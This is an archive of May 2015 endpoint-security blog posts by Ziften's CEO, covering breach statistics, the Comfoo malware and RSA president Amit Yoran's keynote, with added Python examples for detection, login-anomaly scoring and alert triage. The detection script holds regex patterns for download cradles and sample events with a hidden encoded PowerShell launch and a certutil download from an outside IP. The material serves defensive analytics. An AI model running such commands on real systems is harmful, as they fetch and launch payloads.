Monthly Archives: May 2015

Charles Leaver – Organizations Are Now At Extreme Risk Of Data Breaches So Policies To Prevent This Must Be Followed

By Ziften CEO Charles Leaver

For United States businesses, a significant cyber attack and the data leakage that follows now look like a matter of “when” rather than “if”, given the new threats that come with fragmented endpoint strategies, cloud computing and data-intensive applications. All too often companies neglect, or inadequately address, vulnerabilities that are already known to them, and when aging IT assets are left poorly protected, cyber criminals take notice.

The range of data breaches taking place is extremely disturbing. A Verizon Risk Team report counted 855 significant breaches, resulting in 174 million lost records, in 2011. The stakes are especially high for companies that handle personally identifiable information (PII): if staff are not trained on compliance and adequate endpoint data protection procedures are not in place, costly legal action is likely to follow.

“The likelihood of a data breach or personal privacy issue taking place in any organization has ended up being a virtual certainty,” Jeffrey Vagle, a legal expert writing for Mondaq, stated. He recommended that record keepers reconsider their approach to network and device security, employee data access controls and the administration of PII. The growing use of cloud services can make preventing data breaches harder, because these services allow enormous volumes of information to be exchanged at once. A single incident could expose millions of files.

Known Vulnerabilities Require Focus

Many IT departments worry constantly about a zero day attack that will cause a data breach and catch them off guard. As an example, Dirk Smith of Network World wrote about an Adobe Acrobat exploit that let attackers carry out sophisticated surveillance. Many IT vulnerabilities arise when software is not kept patched, and many zero day threats stem from weaknesses in legacy code, including a Windows bug that targeted features first introduced twenty years earlier.

Security professional Jim Kennedy wrote in a Continuity Central post: “something that I have found is that many of the breaches and intrusions which succeeded did so by attacking known vulnerabilities that had actually been identified and had been around for several years: not from some advanced ‘zero-day’ attack which was unidentified and unknown until just the other day by the security community at large.” “And, much more troubling, social engineering continues to be a most successful method to begin and/or precipitate an attack.”

Cyber criminals now have access to an extensive range of pre-packaged malware. These tools can perform complex network and host reconnaissance and then suggest the most effective attack technique. Another threat is a human one: employees who are not trained to screen calls or messages from people falsely claiming to belong to the technical support team of an external security company.

It is certainly important to resist zero day attacks proactively with robust endpoint protection software, but organizations also need to combine effective training and processes with the hardware and software solutions. While most organizations have a number of security policies in place, enforcement is usually the problem. The result is that dangerous fluctuations in data movement and network traffic, which security personnel should be examining, go unnoticed and unaddressed.


Charles Leaver – Widespread Cyber Attacks Are Now Starting At Organization Endpoints

From The Desk Of Charles Leaver CEO Ziften Technologies


With the arrival of bring your own device (BYOD) policies and cloud computing, securing individual endpoints has become more difficult, as administrators may prioritize ease of data access over security. The risks are real, because most current-generation endpoint security software has not been adapted to defend against aggressive hacking and attack methods that use individual endpoints as the launch pad for widely distributed attacks.

A well-known endpoint attack took place in 2010, when a malware strain called Comfoo was used to compromise the networks of many multinational organizations. Comfoo consisted of a variety of custom-developed backdoor Trojans and exploits that could continuously distribute malware. More seriously, the malware could cause harmful data leakage by scraping account and network details and monitoring all user input, according to CRN contributor Robert Westervelt. Comfoo is thought to have been part of an advanced cyber espionage campaign, given the approach used and its evasion of standard endpoint monitoring.

Using email phishing and social engineering, the malware was able to compromise targeted devices, which highlights how ripe endpoints have become for malware infiltration, according to security executive Jason O’Reilly. Speaking to ITWeb, O’Reilly said that traditional endpoint software mostly fails to account for access from locations beyond the IT department, and does not use access controls to limit data exposure to authorized individuals.

O’Reilly said that “endpoint security solutions need to provide layered security that goes beyond signature-based detection just to consist of heuristic-based detection and polymorphic-based detection.” “Today’s networks are exposed to hazards from many different sources.”

Real Time Risk Capturing And Report Creation

The high stakes for control methods and endpoint security were recognized by business consulting firm Frost & Sullivan, which saw both areas under pressure from external attackers and from employees’ insistent demand for flexibility in device choice.

Frost & Sullivan analyst Chris Rodriguez stated: “business IT departments now deal with significant pressure to enable staff members to access the corporate network and files from their own personal devices.” “Considering their seemingly omnipresent nature, quick data connections, and effective hardware and OS, these devices represent prime targets for hackers.”

When asked what organizations can do to shore up the particular weaknesses of mobile hardware, O’Reilly advised that any solution must provide clear and extensive visibility into what is happening on each endpoint, so that action can be taken quickly when threats are found.


Charles Leaver – In A Survey Two Thirds Of Organizations Claimed That They Were Immune From Cyber Attacks

By Charles Leaver Ziften Technologies CEO

A great many companies believe there is no need to pursue assiduous data loss prevention; they regard cyber attacks as either very unlikely to happen or as having minimal financial effect if they do. Recorded cases of cyber attacks are increasing, and advanced persistent threats have actually contributed to this complacency: such attacks tend to evade standard endpoint security software, so the victim never sees them, and while they lack the teeth of a denial-of-service attack, they have the potential to cause considerable damage.

Over 67% of companies stated that they had not been the victims of a cyber attack in the last 18 months, or that they had little or no visibility into whether an attack had compromised their network, according to Infosecurity. The organizers of the survey were skeptical of the results and pointed to the many vulnerable desktop and mobile endpoints now common in businesses.

Security professional and survey organizer Tom Cross stated: “Any system you link to the Internet is going to be targeted by attackers very rapidly afterwards.” “I would assert that if you’re uncertain whether or not your company has had a security occurrence, the possibilities are extremely high that the answer is yes.”

Around 16% said they had experienced a DDoS attack over the same period, and 18% reported malware infiltrations. Regardless, most of the organizations assessed the effects as minor and not justifying the installation of new endpoint security and control systems. Approximately 38% stated that they had experienced no detected security breaches, and only 20% admitted to financial losses.

Reputational loss was more widespread, affecting around 25% of respondents. Highlighting the possible financial and reputational effect of a cyber attack, an incident at the University of Delaware resulted in 74,000 people having their sensitive data exposed, according to WDEL contributor Amy Cherry. The hackers targeted the university’s website and scraped university identification numbers and Social Security Numbers, which led the university to provide free credit monitoring to the affected parties.


Cyber Security Using Dark Ages Methods Must Be Moved Away From Confirms RSA President – Charles Leaver

Written By Dr Al Hartmann And Presented By Charles Leaver CEO Ziften Technologies

A 5 Point Plan For A New Security Approach Proposed By Amit Yoran

RSA President Amit Yoran gave an excellent keynote at the RSA Conference that reinforced the Ziften strategy: continuous endpoint monitoring, silo-busting Ziften Open Visibility™, risk-focused security analytics, and robust defenses for a new era of advanced cyber attacks. Yoran criticized current enterprise security strategy as bogged down in the Dark Ages of cyber moats and castle walls, called it an “impressive fail”, and outlined his vision for the future in five main points. Commentary from Ziften’s point of view is included with each.

Stop Believing That Even Advanced Protections Are Sufficient

“No matter how high or smart the walls, focused adversaries will discover methods over, under, around, and through.”

Many of the recent, more advanced attacks did not use malware as their main method. Yoran cited conventional endpoint anti-virus, firewalls and conventional IPS as examples of the Dark Ages, and said these legacy defenses are easily scaled by skilled attackers and largely inadequate. Signature-based anti-virus can only protect against previously seen threats, yet unseen threats are the most dangerous to an organization, since they are the norm in targeted attacks. Targeted attackers use malware only 50% of the time, and then perhaps only briefly, at the start of the attack. Attack artifacts are cheaply changed and never reused in targeted attacks. Accumulating billions of transient indicators of compromise and malware signatures in large anti-virus signature databases is a pointless defensive approach.

Adopt a Deep and Pervasive Level of True Visibility Everywhere – from the Endpoint to the Cloud

“We require pervasive and true visibility into our business environments. You just can’t do security today without the visibility of both continuous complete packet capture and endpoint compromise evaluation visibility.”

This means continuous endpoint monitoring across the enterprise endpoint population for generic indicators of compromise (not stale attack artifacts) that reflect classic attacker methods rather than short-lived hex-string coincidences. Any company running continuous full packet capture (comparatively costly) can easily afford endpoint threat assessment visibility (comparatively inexpensive). Logging and auditing endpoint process activity yields a wealth of security insight using only elementary analytics techniques. A targeted attacker relies on the relative opacity of endpoint user and system activity to mask and hide the attack; true visibility shines a bright light on it.
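As an added example (Python written for this page, not Ziften's product code and not anything from Yoran's keynote), the script below applies a handful of generic indicator-of-compromise rules to process-creation records. The record layout, rule names, sample hosts and command lines are assumptions constructed for the example. The rules encode attacker methods rather than hashes of particular samples: a document application spawning a shell, an encoded PowerShell command, a core system binary name run from a user-writable folder, and a download cradle on the command line.

```python
"""Generic indicator-of-compromise rules over endpoint process telemetry.

Added example (not Ziften code). It assumes process-creation records with
host, user, parent image, image and command line, the fields a Sysmon
Event ID 1 or an EDR agent records. All events below are constructed.
"""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    host: str
    user: str
    parent_image: str
    image: str
    cmdline: str


def _norm(path: str) -> str:
    return path.replace("\\", "/").lower()

def base(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return _norm(path).rsplit("/", 1)[-1]

def folder(path: str) -> str:
    """Lower-cased directory of a path, '' when there is none."""
    n = _norm(path)
    return n.rsplit("/", 1)[0] if "/" in n else ""


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
CORE_SYSTEM_BINARIES = {"svchost.exe", "lsass.exe", "csrss.exe", "services.exe", "winlogon.exe"}
SYSTEM_DIRS = {"c:/windows/system32", "c:/windows/syswow64"}

# -e / -ec / -enc / -EncodedCommand: a base64-encoded PowerShell payload.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)(?:\s|$)")
# Common download cradles used to pull a second stage.
DOWNLOAD_CRADLE = re.compile(
    r"(?i)downloadstring\(|downloadfile\(|invoke-webrequest|\biwr\s|"
    r"certutil(?:\.exe)?\s+-urlcache|bitsadmin(?:\.exe)?\s+/transfer"
)


def office_spawns_script_host(e: ProcEvent) -> bool:
    """A document application starting a shell: macro or exploit payload."""
    return base(e.parent_image) in OFFICE_APPS and base(e.image) in SCRIPT_HOSTS

def encoded_powershell(e: ProcEvent) -> bool:
    """PowerShell launched with an encoded command line (fileless stager)."""
    return base(e.image) == "powershell.exe" and ENCODED_FLAG.search(e.cmdline) is not None

def system_binary_name_outside_system_dir(e: ProcEvent) -> bool:
    """Masquerading: a core system binary name executed from a non-system folder."""
    return base(e.image) in CORE_SYSTEM_BINARIES and folder(e.image) not in SYSTEM_DIRS

def download_cradle(e: ProcEvent) -> bool:
    """Any process whose command line fetches content from the network."""
    return DOWNLOAD_CRADLE.search(e.cmdline) is not None


RULES: Dict[str, Callable[[ProcEvent], bool]] = {
    "office_spawns_script_host": office_spawns_script_host,
    "encoded_powershell": encoded_powershell,
    "system_binary_name_outside_system_dir": system_binary_name_outside_system_dir,
    "download_cradle": download_cradle,
}


def scan(events: List[ProcEvent]) -> List[dict]:
    """Apply every rule to every event; one finding per (event, rule) hit."""
    findings = []
    for e in events:
        for name, rule in RULES.items():
            if rule(e):
                findings.append({"host": e.host, "user": e.user, "image": e.image, "rule": name})
    return findings

def hosts_by_hit_count(findings: List[dict]) -> List[Tuple[str, int]]:
    """Hosts ranked by number of findings: the first cut for triage."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f["host"]] = counts.get(f["host"], 0) + 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


# Constructed sample telemetry: a phishing-document chain on ws-17 and a
# certutil download on ws-22, mixed with normal activity.
SAMPLE_EVENTS = [
    ProcEvent("ws-17", "alice", r"C:\Windows\explorer.exe",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              '"WINWORD.EXE" /n invoice.docx'),
    ProcEvent("ws-17", "alice", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcEvent("ws-17", "alice", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Users\alice\AppData\Local\Temp\svchost.exe",
              r"C:\Users\alice\AppData\Local\Temp\svchost.exe"),
    ProcEvent("ws-22", "SYSTEM", r"C:\Windows\System32\services.exe",
              r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
    ProcEvent("ws-22", "bob", r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              'cmd.exe /c "certutil.exe -urlcache -split -f http://198.51.100.7/a.txt a.txt"'),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f)
    print(hosts_by_hit_count(scan(SAMPLE_EVENTS)))
```

None of these rules needs a sample hash or a C2 address: the attacker can recompile the payload and rotate the domain, but a Word process that spawns PowerShell with `-enc` still trips the same two rules. The legitimate `services.exe` → `svchost.exe` launch from System32 is not flagged, which is the reason the masquerading rule keys on the folder rather than on the name alone.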

Identity and Authentication Matter More than Ever

“In a world with no perimeter and with less security anchor points, identity and authentication matter even more … At some point in [any effective attack] campaign, the abuse of identity is a stepping stone the aggressors utilize to enforce their will.”

Stronger authentication is fine, but it just makes for higher walls that are still not impenetrable. What the attacker does after getting over the wall is what matters most. Track user endpoint logins (both local and remote) and application use for signs of unusual user activity, whether an insider attack or possibly compromised credentials. Any observed activity that differs from the user’s normal pattern is potentially suspicious. One departure from normality does not make a case, but security analytics that triangulates several departures focuses security attention on the highest-risk anomalies for triage.
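One way to do that triangulation, as an added example in Python that is not Ziften's product code: build a per-user baseline of hosts, hours, remote use and first application from login history, count the distinct ways each recent session departs from that baseline, and surface only users with more than one kind of departure. The record fields, the one-hour tolerance, the threshold and the sample users are assumptions constructed for the example.

```python
"""Triangulating several departures from a user's login baseline.

Added example (not Ziften code). It assumes login records carrying the
user, the endpoint, the local hour, whether the session was remote
(RDP/SSH/VPN) and the first application the session launched; all
history and recent events below are constructed.
"""
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple


@dataclass(frozen=True)
class LoginEvent:
    user: str
    host: str
    hour: int      # local hour of day, 0-23
    remote: bool   # True for RDP/SSH/VPN, False for console logins
    app: str       # first application started in the session


@dataclass
class Baseline:
    hosts: Set[str] = field(default_factory=set)
    hours: Set[int] = field(default_factory=set)
    remote_seen: bool = False
    apps: Set[str] = field(default_factory=set)


def build_baselines(history: List[LoginEvent]) -> Dict[str, Baseline]:
    """Per-user profile of what 'normal' looked like over the history window."""
    profiles: Dict[str, Baseline] = defaultdict(Baseline)
    for e in history:
        p = profiles[e.user]
        p.hosts.add(e.host)
        p.hours.add(e.hour)
        p.remote_seen = p.remote_seen or e.remote
        p.apps.add(e.app)
    return dict(profiles)


def departures(e: LoginEvent, p: Baseline) -> List[str]:
    """Ways in which one event differs from the user's baseline."""
    out = []
    if e.host not in p.hosts:
        out.append("new_host")
    # one hour of tolerance either side of any hour seen before
    # (no midnight wrap-around handling; add it for shift workers)
    if all(abs(e.hour - h) > 1 for h in p.hours):
        out.append("off_hours")
    if e.remote and not p.remote_seen:
        out.append("first_remote_login")
    if e.app not in p.apps:
        out.append("new_app")
    return out


def score_users(history: List[LoginEvent], recent: List[LoginEvent]) -> List[Tuple[str, int, List[str]]]:
    """Score = number of distinct departure types across the user's recent sessions."""
    profiles = build_baselines(history)
    per_user: Dict[str, Set[str]] = defaultdict(set)
    for e in recent:
        p = profiles.get(e.user)
        per_user[e.user].update(departures(e, p) if p else ["no_baseline"])
    return sorted(((u, len(d), sorted(d)) for u, d in per_user.items()),
                  key=lambda r: (-r[1], r[0]))


def triage(history: List[LoginEvent], recent: List[LoginEvent], min_departures: int = 2):
    """Only users with several independent departures reach the analyst queue."""
    return [r for r in score_users(history, recent) if r[1] >= min_departures]


# Constructed baseline: each user's usual endpoint, hours and applications.
HISTORY = (
    [LoginEvent("alice", "ws-alice", h, False, app)
     for h, app in [(8, "outlook.exe"), (9, "excel.exe"), (13, "outlook.exe"), (17, "excel.exe")]]
    + [LoginEvent("bob", "ws-bob", h, False, "chrome.exe") for h in range(9, 19)]
    + [LoginEvent("carol", "ws-carol", h, False, "outlook.exe") for h in (9, 10, 14)]
)

# Constructed recent activity: carol's credentials used remotely on a finance server at 03:00.
RECENT = [
    LoginEvent("alice", "ws-alice", 9, False, "outlook.exe"),
    LoginEvent("bob", "ws-bob", 22, False, "chrome.exe"),
    LoginEvent("carol", "srv-fin-01", 3, True, "powershell.exe"),
    LoginEvent("dave", "ws-dave", 10, False, "chrome.exe"),
]

if __name__ == "__main__":
    for row in score_users(HISTORY, RECENT):
        print(row)
    print("triage:", triage(HISTORY, RECENT))
```

Bob working late produces one departure and stays out of the queue; carol's session on a host she has never used, at 03:00, over a remote protocol, starting PowerShell, produces four independent departures and is the only entry surfaced. A user with no baseline at all is reported as such rather than silently scored zero.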

External Threat Intelligence Is A Core Capability

“There are incredible sources for the best risk intelligence … [which] need to be machine-readable and automated for increased speed and leverage. It needs to be operationalized into your security program and tailored to your company’s assets and interests so that analysts can quickly deal with the threats that pose the most risk.”

Targeted attacks usually do not reuse easily signatured artifacts, network addresses or C2 domains, but there is still value in threat intelligence feeds that aggregate timely discoveries from millions of endpoint and network threat sensors. Here at Ziften we integrate third party threat feeds via the Ziften Knowledge Cloud, and expose Ziften discoveries to SIEM and other enterprise security and operations infrastructure through our Open Visibility™ architecture. As machine-readable threat intelligence (MRTI) feeds mature, this capability will grow in effectiveness.

Understand What Matters Most To Your Business And What Is Mission Critical

“You need to comprehend exactly what matters to your organization and what is mission critical. You have to … protect exactly what’s important and protect it with everything you have.”

This is the basis for risk-driven analytics and instrumentation that focus security attention and effort on the areas of highest business risk exposure. Yoran argues that asset value prioritization is only one side of business risk analysis, which goes much deeper, both pragmatically and academically. Security analytics that focus staff attention on the most pressing dynamic risks (for instance by filtering, correlating and scoring SIEM alert streams for security triage) must be well grounded in all sides of business risk analysis.
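As an added illustration in Python (not Ziften's code and not any particular SIEM's API) of filtering, correlating and scoring an alert stream with asset value in the formula: alerts are clustered per host within a time window, rules tuned out after review are dropped, and each cluster is scored as the highest severity times the asset's business criticality times a corroboration factor for independent tools agreeing. The alert layout, the asset inventory, the suppressed rule, the weights and the sample alerts are all assumptions constructed for the example.

```python
"""Scoring a SIEM alert stream by asset criticality and corroboration.

Added example (not Ziften code). It assumes a normalized alert record
(timestamp, host, source tool, rule name, source-assigned severity) and an
asset inventory giving each host a business criticality; every alert and
asset below is constructed for the example.
"""
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List


@dataclass(frozen=True)
class Alert:
    ts: datetime
    host: str
    source: str     # tool that raised it: "edr", "av", "ids", ...
    rule: str
    severity: int   # 1 (informational) .. 5 (critical), as the source rates it


@dataclass(frozen=True)
class Asset:
    criticality: int   # 1 (disposable lab box) .. 5 (mission critical)
    owner: str


# Constructed inventory. Hosts missing from it get a moderate default and a flag.
ASSETS: Dict[str, Asset] = {
    "dc-01": Asset(5, "identity-team"),
    "ws-44": Asset(2, "sales"),
    "lab-07": Asset(1, "research"),
}
UNKNOWN_ASSET = Asset(2, "unknown")

# source:rule pairs tuned out after review (constructed); they never reach triage.
SUPPRESSED_RULES = {"av:heuristic_generic_pua"}


def correlate(alerts: List[Alert], window: timedelta = timedelta(hours=1)) -> List[List[Alert]]:
    """Cluster alerts per host; consecutive alerts within `window` join one cluster."""
    by_host: Dict[str, List[Alert]] = defaultdict(list)
    for a in sorted(alerts, key=lambda a: (a.host, a.ts)):
        if f"{a.source}:{a.rule}" not in SUPPRESSED_RULES:
            by_host[a.host].append(a)
    clusters = []
    for items in by_host.values():
        current = [items[0]]
        for a in items[1:]:
            if a.ts - current[-1].ts <= window:
                current.append(a)
            else:
                clusters.append(current)
                current = [a]
        clusters.append(current)
    return clusters


def score_cluster(cluster: List[Alert], assets: Dict[str, Asset]) -> float:
    """severity x asset criticality x corroboration (independent tools agreeing)."""
    asset = assets.get(cluster[0].host, UNKNOWN_ASSET)
    max_severity = max(a.severity for a in cluster)
    distinct_sources = len({a.source for a in cluster})
    corroboration = 1.0 + 0.5 * (distinct_sources - 1)
    return max_severity * asset.criticality * corroboration


def triage_queue(alerts: List[Alert], assets: Dict[str, Asset]) -> List[dict]:
    """Ranked work queue: highest business risk first."""
    rows = []
    for c in correlate(alerts):
        rows.append({
            "host": c[0].host,
            "asset_known": c[0].host in assets,
            "score": score_cluster(c, assets),
            "alerts": len(c),
            "sources": sorted({a.source for a in c}),
            "top_rule": max(c, key=lambda a: a.severity).rule,
        })
    return sorted(rows, key=lambda r: (-r["score"], r["host"]))


T0 = datetime(2015, 5, 12, 9, 0)
# Constructed day of alerts: a credential-theft chain on the domain controller,
# repetitive DNS noise on a workstation, one hit on a lab box and one on an
# unknown host.
SAMPLE_ALERTS = [
    Alert(T0 + timedelta(minutes=60), "dc-01", "edr", "lsass_memory_read", 4),
    Alert(T0 + timedelta(minutes=65), "dc-01", "av", "mimikatz_detected", 3),
    Alert(T0, "ws-44", "ids", "dns_txt_query_burst", 3),
    Alert(T0 + timedelta(minutes=10), "ws-44", "ids", "dns_txt_query_burst", 3),
    Alert(T0 + timedelta(minutes=20), "ws-44", "ids", "dns_txt_query_burst", 3),
    Alert(T0 + timedelta(minutes=25), "ws-44", "av", "heuristic_generic_pua", 2),
    Alert(T0 + timedelta(hours=6), "ws-44", "edr", "usb_device_inserted", 1),
    Alert(T0 + timedelta(hours=2), "lab-07", "edr", "suspicious_service_install", 4),
    Alert(T0 + timedelta(hours=3), "bld-09", "ids", "outbound_smb_to_internet", 4),
]

if __name__ == "__main__":
    for row in triage_queue(SAMPLE_ALERTS, ASSETS):
        print(row)
```

Ranked by source severity alone, the lab box's severity 4 alert would sit above the workstation's severity 3 DNS cluster; with asset criticality in the formula the order flips, and the domain controller, where two independent tools agree, leads the queue by a wide margin. An unknown host is scored at a moderate default but flagged, because a machine missing from the inventory is itself a finding. Whether a severity 5 alert should always float to the top regardless of asset is a policy decision that belongs in the scoring function, not in the analyst's head.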

At Ziften we applaud Amit Yoran’s messages in his RSA 2015 keynote address as the cyber security industry evolves beyond the present Dark Ages of facile targeted attacks and routine exploitation.